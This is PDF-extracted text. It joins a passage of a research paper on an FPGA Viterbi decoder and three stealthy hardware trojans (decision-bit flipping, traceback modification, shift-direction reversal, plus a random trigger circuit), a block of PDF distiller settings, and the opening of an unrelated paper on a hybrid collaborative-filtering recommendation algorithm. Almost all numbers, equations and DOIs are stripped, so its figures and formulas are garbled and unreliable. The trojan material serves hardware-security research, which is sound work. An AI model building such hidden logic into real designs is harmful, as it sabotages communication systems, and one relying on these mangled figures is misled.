clock cycle to the decoder block for further processing. at every clock cycle two lsb bits are shifted out to the branch metric unit (bmu) block. after every four clock cycles, the subsequent bram location is read and processed similarly. figure block level diagram for fpga implementation of viterbi decoder. full-size doi: . /peerj-cs. /fig- figure input interface. full-size doi: . /peerj-cs. /fig- kakkara et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ decoder design figure shows the top level block diagram of the decoder consisting of the bmu, path metric unit (pmu), survivor path memory unit (spmu), spmu_controller and the trace back unit (tbu). branch metric and path metric units the bmu calculates the hamming distance between the received frame and the branch word while the pmu performs add-compare-select (acs) calculations as described in middya & dhar ( ). figures and show the blocks used for the hamming distance calculation and the acs units. during every clock cycle, bmu calculates the eight branch metrics corresponding to the two transitions of each of the four states. the branch metrics are then passed on to the pmu that updates each state with the least path metric corresponding to each of the states and also stores the corresponding path leading to it in the form of a “decision bit,” one for each of the four states at every time instant. it can be seen from the trellis diagram in figure decoder block diagram. full-size doi: . /peerj-cs. /fig- figure hamming distance unit. full-size doi: . /peerj-cs. /fig- kakkara et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ fig. that each state has two incoming paths. the decision bit is set to “ ” if the state is reached from the top branch while it is set to “ ” if it is reached from the bottom branch. figure shows the block diagram of the pmu block to update the path metrics and for decision bit calculations for the four states. survivor path memory unit and trace back unit survivor path memory is designed as a single port bram that stores the decision bit values of all states at each of the time instants. the structure of the spmu is the same as the trellis structure shown in fig. . for the input data size of , bytes, the number of decision bits generated would be , for every state. thus a × , bram is used as the spmu. the spmu_update module reads the decision bits from the pmu block and updates the spmu every clock cycle. this continues till the spmu is populated with all the × , figure pmu blocks for all the four states. full-size doi: . /peerj-cs. /fig- figure add carry select block. full-size doi: . /peerj-cs. /fig- kakkara et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ decision bit values. once the spmu is populated with the decision bits, the decode_en bit is triggered high and the trace back unit kicks in to start the reverse process to decode the original input bits. figure shows the state machine used for the trace back operation. since the encoded message is terminated with zeros, the final state of the system would be the zero state and hence tbu can be safely initialized to start the decoding from the zero state. after decoding all the , bits, decode_done signal is activated to trigger the output interface. it is to be noted that it takes around , clock cycles for the forward tracing, , clock cycles for traceback and few cycles are required for synchronization. output interface the output interface consists of a first-in-first-out (fifo) buffer of size × ( , bits) to store the decoded data and the baud generator and transmitter modules of uart to transmit the data serially on to a pc. the uart is designed with a frame length of (one start bit, eight data bits and one stop bit) and works at a baud-rate of , bps. figure shows the uart frame used in the design. the data from the decoder is first stored in the fifo and is transmitted when an external request for data transfer is enabled. the fifo is designed using a bram of size × . fifo is chosen to be one byte wide to enable byte wise data transfer to the uart figure bit uart frame. full-size doi: . /peerj-cs. /fig- figure state transition diagram of the trace back unit (tbu). full-size doi: . /peerj-cs. /fig- kakkara et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ transmitter easily. figure shows the transmitter block designed to operate at a baud rate of , bps. the uart transmitter contains the baud generator that generates the uart clock corresponding to a baud rate of , bps. to generate this clock from the master clock, we use a clock divider whose value can be obtained by using eq. ( ) baudrate ¼ master clkð � divisorÞ ( ) since the master clock of the fpga board (zybo-z ) is mhz, we need to design a clock divider of value given by eq. ( ) divisor ¼ master clkð � baudrateÞ ¼ : ( ) rounding off to the nearest highest integer, we use a clock divider of value to generate the uart clock and data is transmitted out serially to the pc through a rs interface. simulation and implementation of viterbi decoder input data generation a coded communication system is set up as detailed in the introduction section, using matlab. k message bits are generated randomly and encoded using a convolutional encoder of rate / to generate k encoded bits. binary phase shift keying modulation is used to modulate the encoded message stream and the resulting data sequence is transmitted through an additive white gaussian noise channel of varying signal to noise rations (snrs). the received sequences are demodulated and stored as inputs for the viterbi decoder. design and functional verification the viterbi decoder was first designed using a behavioral model in matlab and then a synthesizable rtl design was done in verilog. the original encoded message sequence (without noise addition) is given as input to the decoders and the output was verified to be the original message sequence. this establishes that the decoders are functionally correct. figure uart transmitter. full-size doi: . /peerj-cs. /fig- kakkara et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ having verified the functionality of the designs using the encoded message as the inputs, the noise-added sequences are given as inputs and the bers are computed. fpga implementation the rtl design of the decoder was synthesized on to a zybo board that is built using z- , a member of xilinx zynq- family. z- is designed using xilinx all programable system-on-chip architecture, that integrates a xilinx -series fpga along with an arm based cortex-a processor. in our work, we have not used the arm processor for generating test inputs but instead, the test vectors are generated from matlab as briefed above and a single port bram is initialized with these input test vectors. the decoded output bits are first stored in another bram and then sent by the uart transmitter to the pmod pins of the zybo board. this transmitted data is driven through a uart-to-usb translator (pl ) and the serial bits are captured on the pc using real term serial terminal (realterm, ). functional verification of the implemented design was done in the same manner as the simulated design. the encoded message bits without noise addition were given as the input and the decoded bits were compared with the original message sequence. it was figure comparative ber plots for matlab behavioral design, rtl design and the fpga implementation (beyond db, the ber is zero). all three plots overlap perfectly, thus establishing the correctness of the implementation. full-size doi: . /peerj-cs. /fig- kakkara et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ verified that the decoded and input message bits matched successfully. for calculating the decoder performance, the decoder was fed with noisy data of different snrs. figure shows the bers obtained for the matlab behavioral model, the rtl design and the fpga implementation where it can be seen that the ber drops down to zero for snrs greater than db . also, there is a perfect overlap of all the plots, thus demonstrating the equivalence of the behavioral, rtl and the implemented models. trojan design and implementation in this work, we propose the design of three possible trojans and study how their stealthy presence may affect the system performance. trojan design : decision-bit flipping trojan (pmu trojan) in the pmu, it is expected that the comparator identifies the least path metric path and correspondingly store a “ ” or “ ” to indicate either of the paths to be traversed during trace back. the proposed trojan decision-bit flipping, when enabled, flips the decision bits thus causing the trace back unit to proceed in an incorrect decoding path. the hardware model of the trojan circuit is shown in fig. . the decision bit is inverted when trojan is enabled and the spmu gets populated with an incorrect value. this causes the lower metric path to be discarded instead of the higher path metric, thus resulting in possible erroneous decoding. trojan design : traceback path modification trojan during trace back, the decision bits from the spmu is read and a path is chosen based on whether the stored value is a “ ” or a “ ”. the traceback path modification trojan inverts this logic and changes the state transitions, thus making it proceed in the wrong path. figure shows the modified state machine due to the trojan being effective. when the trojan is enabled, the transitions are made to differ from the original state transitions resulting in erroneous decoding. trojan design : shift-direction-modifying trojan in the output interface, when the decoded data is being written into the shift register, normally it will be right shift operation. but when the trojan is enabled this operation will be reversed and performs left_shift thus sending erroneous data to the transmitter. this can be achieved by the use of multiplexers that can alter the shift direction based on figure pmu trojan. full-size doi: . /peerj-cs. /fig- since the ber is plotted on a log scale, it is not possible to indicate the zero values on the plot kakkara et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the trojan enable signal. figure shows the trojan circuitry that is created due to this trojan. results and discussions the effectiveness of the designed trojans can be gauged by their stealthy nature and by their propensity to degrade the performance of the infected system. figure shift direction modifying trojan. full-size doi: . /peerj-cs. /fig- figure trojan effect modifying the trace back path in the tbu. full-size doi: . /peerj-cs. /fig- kakkara et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ stealthy trojans trojans by nature are stealthy in nature and are difficult to detect. to verify if the proposed trojan models are stealthy enough to evade detection, the difference in the area and power dissipated due to the trojan insertion are calculated. tables and show the power and utilization summary of the trojan free circuits and the trojan affected circuits. it is to be noted that the parameters obtained is only for the decoder logic without including the input bram and the output uart. it can be seen from the power and area utilization results that in the worst case, there is a difference of only mw of on-chip power (difference of . %), and only four extra luts (change of . %) due to the trojan insertions. this establishes its stealthy nature, thus qualifying them as effective trojans. performance degradation to analyze how effectively the trojans disrupt the natural decoding process, the trojans are triggered at random time instants and the decoded bits are analyzed. generally, trojans are designed to activate surreptitiously in order to go unnoticed. hence the triggering was done only once during the entire decoding process and the effect of this triggering is observed and the resultant ber is calculated. trojan triggering logic figure shows the circuit for generating trojan enable signal. it consists of a bram, a bit counter to count up to the maximum possible number of clock cycles required for decoding and a comparator. the trojan can be triggered any time during the entire duration of decoding. to identify these triggering instances, random numbers are generated and stored in a block ram. during each triggering one location is read from the bram as the triggering instance. the trojan enable signal is generated when the counter value matches with the random number being read from the bram. the ber is calculated to be the average of the bers obtained from all the triggering instances. table power summary table. power summary (w) without trojan pmu trojan tbu trojan shift modification trojan total on-chip power . . . . dynamic . . . . device static . . . . table utilization summary table. utilization without trojan pmu trojan tbu trojan shift modification trojan site type available used util% used util% used util% used util% slice luts , . . . . lut as logic , . . . . lut as memory , . . . . kakkara et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ figure trojan triggering logic. full-size doi: . /peerj-cs. /fig- figure ber plot for pmu trojan. full-size doi: . /peerj-cs. /fig- kakkara et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ effect of the triggered trojans the effect of the trojans may be quantified by the increase in the bers of the infected decoder. figures – show the comparative ber graphs of the decoder without trojan and with trojan being activated only once. it can be seen that in the absence of trojans, the ber drops down to zero for snrs greater than db, but with the trojans being active, the ber doesn’t reduce to zero even for high snrs. thus the trojans leave a distinctive ber signature (high ber). among the three trojans, the ber signature is highest for tbu trojan and lowest for pmu trojan, with the shift modification trojan producing a ber signature in between the other two. it is also interesting to note that the difference in the performances between the trojan free design and the design with trojans is negligible in the low snr regions but the difference is prominent in the high snr regions. also at some low snr conditions, the performance of the trojan affected system is slightly better than the unaffected system. this scenario is possible since, in the low snr regions, the data itself is noisy and erroneous. during the bit flipping or the state transition or the shift direction modifying actions of the trojans there exists a possibility that few erroneous bits are converted to correct bits, thus providing a reverse effect on the system. the possibility of this kind of behavior, along with the fact that trojans are stealthy make it difficult to conjure figure ber plot for tbu trojan. full-size doi: . /peerj-cs. /fig- kakkara et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ effective trojan detection schemes. to counter such situations, the current focus of researchers is to neutralize them apart from detecting the trojans (gunti & lingasubramanian, ). study limitations the study proposes stealthy trojans—decision bit flipping, traceback path modification and shift direction changing trojans—and their effect on the decoding efficiency of a viterbi decoder. the trojans degrade the performance of the decoder, causing it to have a high ber. but, it is to be noted that high ber can also arise in a system due to high noise in the channel. hence in situations where the channel’s noise characteristics are unknown, the presence of these trojan can’t be inferred purely from the ber signature. it needs to be augmented with other trojan detection schemes to correctly infer the presence of trojans. conclusions in this work, we have designed a fpga based implementation of a viterbi decoder and presented possible effects of hardware trojans on coded communication systems. three unique threat models are developed and tested on the viterbi decoder which is popular figure ber plot for shift direction modifying trojan. full-size doi: . /peerj-cs. /fig- kakkara et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ for its low ber performance. however, we show that the presence of the proposed trojans affect the efficiency of the viterbi decoder by increasing the ber. the stealthiness of the proposed trojans is also established. using the proposed threat models, we envision to test their effects on complex systems like cps and iot which rely on efficient communication channels. with the wide application of convolution codes in various snr scenarios, the results of the implemented system play a significant role in emphasizing the need for efficient trojan detection schemes. it is envisaged that apart from ber signature analysis, other trojan detection and neutralizing schemes will be explored for the proposed trojans. additional information and declarations funding this work was supported by space application center, isro through respond project /isro/res/ / / - . deepak mishra from isro is a coauthor and was involved in the study design, analysis and preparation of the article. grant disclosures the following grant information was disclosed by the authors: space application center, isro through respond project: /isro/res/ / / - . competing interests deepak mishra is a scientist at the indian space research organization (isro), ahmedabad, india. author contributions � varsha kakkara conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � karthi balasubramanian conceived and designed the experiments, performed the experiments, analyzed the data, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � b. yamuna conceived and designed the experiments, analyzed the data, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � deepak mishra conceived and designed the experiments, authored or reviewed drafts of the paper, and approved the final draft. � karthikeyan lingasubramanian conceived and designed the experiments, analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. � senthil murugan conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, authored or reviewed drafts of the paper, and approved the final draft. kakkara et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ data availability the following information was supplied regarding data availability: the raw data generated from matlab are available in the supplemental files. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references aravind ar, kesavaraman sr, balasubramanian k, yamuna b, lingasubramaniam k. . effect of hardware trojans on the performance of a coded communication system. in: ieee international conference on consumer electronics (icce). las vegas: ieee, – . banga m, chandrasekar m, fang l, hsiao ms. . guided test generation for isolation and detection of embedded trojans in ics. in: proceedings of the th acm great lakes symposium on vlsi. new york: acm, – . chakraborty rs, narasimhan s, bhunia s. . hardware trojan: threats and emerging solutions. in: ieee international high level design validation and test workshop. san francisco: ieee, – . colins d. . trust in integrated circuits (tic): darpa solicitation baa - . arlington county: darpa. forney gd. . convolutional codes . maximum-likelihood decoding. information and control ( ): – doi . /s - ( ) - . gunti nb, lingasubramanian k. . effective usage of redundancy to aid neutralization of hardware trojans in integrated circuits. integration : – doi . /j.vlsi. . . . hemati s. . mitigating hardware cyber-security risks in error correcting decoders. in: th international symposium on turbo codes and iterative information processing (istc). brest: ieee, – . karri r, rajendran j, rosenfeld k, tehranipoor m. . trustworthy hardware: identifying and classifying hardware trojans. computer ( ): – doi . /mc. . . kumar m, swain ak, kumar s, sahoo sr, mahapatra k. . run time mitigation of performance degradation hardware trojan attacks in network on chip. in: ieee computer society annual symposium on vlsi (isvlsi). hong kong: ieee, – . liu y, jin y, nosratinia a, makris y. . silicon demonstration of hardware trojan design and detection in wireless cryptographic ics. ieee transactions on very large scale integration (vlsi) systems ( ): – doi . /tvlsi. . . middya a, dhar as. . real-time area efficient and high speed architecture design of viterbi decoder. in: nd international conference on advances in electrical, electronics, information, communication and bio-informatics (aeeicb). chennai: ieee, – . narasimhan s, du d, chakraborty rs, paul s, wolff fg, papachristou ca, roy k, bhunia s. . hardware trojan detection by multiple-parameter side-channel analysis. ieee transactions on computers ( ): – doi . /tc. . . ranjani rs, devi mn. . malicious hardware detection and design for trust: an analysis. elektrotehniski vestnik ( / ): – . realterm. . serial/tcp terminal. available at https://sourceforge.net/projects/realterm/ (accessed april ). kakkara et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /j.vlsi. . . http://dx.doi.org/ . /mc. . http://dx.doi.org/ . /tvlsi. . http://dx.doi.org/ . /tc. . https://sourceforge.net/projects/realterm/ http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ saeidi r, garakani hg. . sram hardware trojan. in: th international symposium on telecommunications (ist). tehran: ieee, – . subramani ks, antonopoulos a, abotabl aa, nosratinia a, makris y. . demonstrating and mitigating the risk of a fec-based hardware trojan in wireless networks. ieee transactions on information forensics and security ( ): – . sweeney p. . error control coding: from theory to practice. new york: john wiley & sons. tehranipoor m, koushanfar f. . a survey of hardware trojan taxonomy and detection. ieee design & test of computers ( ): – . tiwari b, yang m, jiang y, wang x. . effect of hardware trojan attacks on the performance of on-chip multicast routing algorithms. in: ieee th annual computing and communication workshop and conference (ccwc). las vegas: ieee, – . trusthub. . trojan benchmarks. available at https://trust-hub.org/benchmarks/trojan (accessed august ). viterbi a. . error bounds for convolutional codes and an asymptotically optimum decoding algorithm. ieee transactions on information theory ( ): – . kakkara et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://trust-hub.org/benchmarks/trojan http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ a viterbi decoder and its hardware trojan models: an fpga-based implementation study introduction viterbi decoder fpga based viterbi decoder design simulation and implementation of viterbi decoder trojan design and implementation results and discussions conclusions references << /ascii encodepages false /allowtransparency false /autopositionepsfiles true /autorotatepages /none /binding /left /calgrayprofile (dot gain %) /calrgbprofile (srgb iec - . ) /calcmykprofile (u.s. web coated \ swop\ v ) /srgbprofile (srgb iec - . ) /cannotembedfontpolicy /warning /compatibilitylevel . /compressobjects /off /compresspages true /convertimagestoindexed true /passthroughjpegimages true /createjobticket false /defaultrenderingintent /default /detectblends true /detectcurves . /colorconversionstrategy /leavecolorunchanged /dothumbnails false /embedallfonts true /embedopentype false /parseiccprofilesincomments true /embedjoboptions true /dscreportinglevel /emitdscwarnings false /endpage - /imagememory /lockdistillerparams false /maxsubsetpct /optimize true /opm /parsedsccomments true /parsedsccommentsfordocinfo true /preservecopypage true /preservedicmykvalues true /preserveepsinfo true /preserveflatness true /preservehalftoneinfo false /preserveopicomments false /preserveoverprintsettings true /startpage /subsetfonts true /transferfunctioninfo /apply /ucrandbginfo /preserve /useprologue false /colorsettingsfile (none) /alwaysembed [ true ] /neverembed [ true ] /antialiascolorimages false /cropcolorimages true /colorimageminresolution /colorimageminresolutionpolicy /ok /downsamplecolorimages false /colorimagedownsampletype /average /colorimageresolution /colorimagedepth /colorimagemindownsampledepth /colorimagedownsamplethreshold . /encodecolorimages true /colorimagefilter /flateencode /autofiltercolorimages false /colorimageautofilterstrategy /jpeg /coloracsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /colorimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg coloracsimagedict << /tilewidth /tileheight /quality >> /jpeg colorimagedict << /tilewidth /tileheight /quality >> /antialiasgrayimages false /cropgrayimages true /grayimageminresolution /grayimageminresolutionpolicy /ok /downsamplegrayimages false /grayimagedownsampletype /average /grayimageresolution /grayimagedepth /grayimagemindownsampledepth /grayimagedownsamplethreshold . /encodegrayimages true /grayimagefilter /flateencode /autofiltergrayimages false /grayimageautofilterstrategy /jpeg /grayacsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /grayimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg grayacsimagedict << /tilewidth /tileheight /quality >> /jpeg grayimagedict << /tilewidth /tileheight /quality >> /antialiasmonoimages false /cropmonoimages true /monoimageminresolution /monoimageminresolutionpolicy /ok /downsamplemonoimages false /monoimagedownsampletype /average /monoimageresolution /monoimagedepth - /monoimagedownsamplethreshold . /encodemonoimages true /monoimagefilter /ccittfaxencode /monoimagedict << /k - >> /allowpsxobjects false /checkcompliance [ /none ] /pdfx acheck false /pdfx check false /pdfxcompliantpdfonly false /pdfxnotrimboxerror true /pdfxtrimboxtomediaboxoffset [ . . . . ] /pdfxsetbleedboxtomediabox true /pdfxbleedboxtotrimboxoffset [ . . . . ] /pdfxoutputintentprofile (none) /pdfxoutputconditionidentifier () /pdfxoutputcondition () /pdfxregistryname () /pdfxtrapped /false /createjdffile false /description << /chs <feff f f fd e b bbe b a b efa ef a fc c a c f f fdb c ad d cf a ef ee f f f c f e ee ca f ad c f b efa > /cht <feff f f e b a d f e efa acb f ef ef c a f c f f e a f ad c cea c a ef ee f f f c f e ee ca f ad c f b f df efa acb ef > /dan <feff e c c e e c f f d f b d e c b c b e e c c b f b c e e e e f d f b d e b e e e f c c f e f e e> /deu <feff e e e c c e e a d c c e f e f d f b d e e c f e e e f b b f d b e e f f d e e a e d f e e c c d f b d e b f e e e d f e f e f f f e e e> /esp <feff c f e f e f d e f f f e d f e c e d f f f d e f f e e e f d e f f f e f c f e f e f f e> /fra <feff c a f f e e e f d e f f e d f e c e d d e e c f d e e e e ea f e f c e f e f e c e e> /ita <feff c a a d f a f e f d e f e d c e d e f f b f e f d e f f e f f e f f e f e e> /jpn <feff ad c cea fa b f f e f c b f f e e b cea b fdd c d e c b af c c d d ea f bf e e f f d eb fc d b e e a d b a f c c f d a a eb f f a f e ee d b f c d e > /kor <feffc c c c c acc a d c ec b c a d cd d d b b d bc f ad c ae c d c c ace d c c b c c c c d f bb c cb c c c d b c b e e c b ac c c c b c bb c cb f bc f f e c c c c d c c c f c c c b b c b e e> /nld (gebruik deze instellingen om adobe pdf-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. de gemaakte pdf-documenten kunnen worden geopend met acrobat en adobe reader . en hoger.) /nor <feff b e e c c e e c e f f d f b d e f b f b c e f b c c f f e d f b d e e b e e e f c c f e c c e e> /ptb <feff c a f e e f f d f d e f f d f c d d f b f f f f e f f d e f f f d f f d f f f f e f f f e> /suo <feff b e e e e e b c b e c f f d f b d e a c b f f e c f a f e e c f d f b d e f e f c c a f e a c c a d d c c e> /sve <feff e e e e e e c c e e e f d c c b f d f b d e f b c b e e c b f f b f b e b d f b d e b e f e f f f e f e e> /enu (use these settings to create adobe pdf documents for quality printing on desktop printers and proofers. created pdf documents can be opened with acrobat and adobe reader . and later.) >> /namespace [ (adobe) (common) ( . ) ] /othernamespaces [ << /asreaderspreads false /cropimagestoframes true /errorcontrol /warnandcontinue /flattenerignorespreadoverrides false /includeguidesgrids false /includenonprinting false /includeslug false /namespace [ (adobe) (indesign) ( . ) ] /omitplacedbitmaps false /omitplacedeps false /omitplacedpdf false /simulateoverprint /legacy >> << /addbleedmarks false /addcolorbars false /addcropmarks false /addpageinfo false /addregmarks false /convertcolors /noconversion /destinationprofilename () /destinationprofileselector /na /downsample bitimages true /flattenerpreset << /presetselector /mediumresolution >> /formelements false /generatestructure true /includebookmarks false /includehyperlinks false /includeinteractive false /includelayers false /includeprofiles true /multimediahandling /useobjectsettings /namespace [ (adobe) (creativesuite) ( . ) ] /pdfxoutputintentprofileselector /na /preserveediting true /untaggedcmykhandling /leaveuntagged /untaggedrgbhandling /leaveuntagged /usedocumentbleed false >> ] >> setdistillerparams << /hwresolution [ ] /pagesize [ . . ] >> setpagedevice (shengquan yang) research of virtual classroom’s collaborative mechanism based on petri net international journal of advanced network, monitoring and controls volume , no. , doi: . /ijanmc- - research on commodity mixed recommendation algorithm chang hao school of computer science and engineering xi'an technological university xi'an, china e-mail: @qq.com yang shengquan school of computer science and engineering xi'an technological university xi'an, china e-mail: @qq.com abstract—with the advent of the era of big data, our lives generate huge amounts of data every day, and the field of e- commerce is no exception. it is particularly important to analyze these data and recommend products. it is reported that through the recommendation algorithm, amazon has increased its sales by about %. among the recommended algorithms, the collaborative filtering algorithm is currently relatively mature and has achieved very good results in various fields. but the traditional collaborative filtering algorithm is too rough when calculating the similarity and prediction score, and the efficiency is very low. we combine the traditional collaborative filtering algorithm with the decision tree algorithm, and improve the traditional recommendation algorithm, create a collaborative filtering decision tree algorithm to recommend products, and run the new collaborative filtering decision tree algorithm on the hadoop platform on. experiments show that the improved algorithm makes the accuracy of recommendation significantly improved. keywords-e-commerce; recommendation algorithm; decision tree; collaborative filtering i. introduction with the development of science and technology, internet technology has also rapidly developed and popularized, so that the data on the network is growing at the level of pb every day, bringing a lot of information resources to users and greatly enriching people's daily lives. however, the problem of rapid expansion of a large number of information resources has also emerged. "information overload" is also a problem that internet users are facing. "information overload" refers to the difficulty for internet users to accurately and quickly locate the information they need from massive data [ ]. the generation of recommendation system has greatly eased the problem of "information overload". the recommendation system is automatic and intelligent to recommend items for users, and it will dynamically adjust the recommended item types according to the changes of user behavior, which truly avoids the "information overload" problem. faced with such a huge amount of data, it is necessary to adopt a big data model for analysis. compared with the traditional data model using random analysis (sampling survey), the big data model analyzes all data and has the characteristics of v, namely large volume, high speed, variety, value. collaborative filtering algorithm is one of the most concise and practical recommendation algorithms. if you use traditional data model for sampling survey, it will inevitably aggravate the sparsity problem of the algorithm itself, so it is of great significance to design a big data model based on collaborative filtering. and necessary. if you want to process big data, a single computer cannot be realized, so the application of distributed architecture is particularly important. so the algorithm model is run under the hadoop distributed framework. mapreduce is a distributed computing framework under hadoop [ ]. it uses the "divide and conquer" idea to decompose complex tasks or data into several simple tasks for parallel processing. afterwards, it performs global summarization, which greatly improves the efficiency of the algorithm. this article mainly studies the distributed recommendation algorithm under the hadoop platform. the recommendation algorithm combines the decision tree and the collaborative filtering algorithm, and improves the traditional collaborative filtering algorithm to improve the timeliness of recommendation. ii. introduction to related technologies a. introduction to the traditional collaborative filtering algorithm collaborative filtering algorithm is the most successful information filtering algorithm used in the international journal of advanced network, monitoring and controls volume , no. , current recommendation system. the main method is to extract the historical behaviors generated by users to make recommendations. the traditional collaborative filtering algorithm is mainly divided into item-based collaborative filtering algorithm (itemcf) and user- based collaborative filtering algorithm (usercf) [ ]. the core process of collaborative filtering algorithm is as follows: collect user preferences, find similar users or items, and calculate recommendations, the core of which is the calculation of similarity euclidean distance similarity method (formula ), pearson correlation coefficient similarity method (formula ), salton similarity method (formula ) and cosine similarity method (formula ) are several common similarities calculation method [ ]. o(x, y) = √(∑(𝑥𝑖 − 𝑦𝑖 ) ) ( )  p(x, y) = n ∑ xi−∑ xi ∑ yi √n ∑ xi −(∑ xi) √n ∑ yi −(∑ yi)  ( ) s(x, y) = ∣n(u)∩n(v)∣ √∣n(u)∣⋅√∣n(v)∣ ( ) cos(x, y) = ∑ xiyi √∑ xi √∑ yi ( ) b. introduction to decision tree it is a typical classification algorithm. it first processes data, uses inductive algorithms to generate readable rules and decision trees, and then uses decisions to analyze new data. after getting the recommended products in the previous step, extract the features [ ]. a data set will extract many features, but which feature is selected as the root node? which feature is selected as the optimal solution? at this time, we need to introduce a new measure-entropy. entropy refers to the uncertainty of random variables. the algorithm for calculating their entropy values is shown in formula : h(x) = − ∑ pi ∗ log pi , i = , , … , n ( ) where pi represents the probability of each feature, it can be seen from the formula that when the probability is greater and the purity is greater, the entropy value will be smaller, and the smaller the entropy value, the more stable the feature. there are three selection criteria for features: information gain (id ), information gain rate (c . ) and gini index (cart). the development of decision trees is getting faster and faster, and many excellent algorithms have been derived, such as gdbt (gradient boosting decision tree), rf (random forest random forest), etc, the decision trees have considerable advantages in terms of accuracy improvement, they are used frequently in various games, and the effect is very good. at some times, the neural network that has been painstakingly built is not as accurate as the relatively simple random structure. the forest is high, so this article will use random forest to optimize the algorithm. iii. recommended algorithm design the collaborative filtering algorithm is the most widely used algorithm in the recommendation system. because of its versatility of the model, it does not require too much expertise in the corresponding data field. the engineering implementation is relatively simple, and the effect is also good. it is widely praised by all walks of life. but collaborative filtering has its own problems, such as "cold start" and "sparseness" has always been a problem of collaborative filtering itself. therefore, in the context of today's big data era, collaborative filtering may not be suitable for direct recommendation algorithms. to solve this problem, this paper designs a hybrid recommendation algorithm. a. random forest random forest because a single decision tree has obvious drawbacks in the recommendation system, a random forest composed of multiple decision trees can effectively solve the problems of a single decision tree. in essence, the decision tree is a special tree because it contains many judgment nodes, and the model of the random forest is composed of multiple decision trees[ ]. the main idea of the random forest algorithm is to use some single classifiers to form a large classifier, which mainly includes the following three steps: step : randomly sample multiple decision trees that need to be generated. as many decision trees as needed, as many training subsets as there should be. this process involves a statistical sampling method, which is to extract several training subsets from the original training set. the sampling method to be used in this thesis is a sampling method based on bagging thought. when the training set is extracted, it can be sampled repeatedly to ensure that the chance of the sample being selected is random and the probability is equal. international journal of advanced network, monitoring and controls volume , no. , step : how to build the decision tree. the decision trees constructed from several training subsets selected in the first step are the main elements that constitute a random forest. the construction of these trees is not restricted by any factors, and does not do any pruning operations on the trees. when constructing a decision tree, not all attributes in the data set are selected as indicators for calculation, but are divided into several randomly selected "optimal" feature attributes, then decompose according to the eigenvalue of k<k. in the decision tree, the c . algorithm is used as the splitting algorithm for attribute selection, and the information gain rate algorithm is given. according to the randomness peculiar to the random forest, first select k attributes as the features of the decision tree. these features all act as classifiers. from the calculation of the training set, we can know the classification standard h(x, θ) ∈ ( , ), x ∈ rn is a randomly selected training sample. θ = (α,φ) represents the parameter of this node, φ represents the matrix, α represents the filtering function, and the surface style of the node feature is determined by α, the formula represents the calculation of the nonlinear plane, and the calculation formula of the linear plane is formula : h(x, θ) = δ(αt(x)φ > ) ( ) h(x, θ) = δ(αt(x)φα(x) > ) ( ) use a recursive method to operate on the data set until the data on a node has all belonged to the same type of feature or the number of data sets on the node has reached the threshold set in advance, then this node will stop continuing to classify, converted to a leaf node. if the above requirements are not met, the node will continue to randomly search for feature attributes for classification. step : the formation of the forest. after repeating the first step and the second step several times, the resulting trees can be used to build random forests. first of all, according to the function of these trees, you can classify the training set, integrate the results of the data set processed by the decision tree, and vote. the final output of the algorithm is the result of the classification with the most votes. b. ahp model ahp (analytic hierarchy process) is a method for making decisions based on the weight of layers. this method through further exploration and analysis of the root of more complex problems and their influencing factors, further proposed a qualitative method to quantify the problem, so as to provide more detailed quantitative information for decision-making. in this research, we adopt the method of analysing the weight of 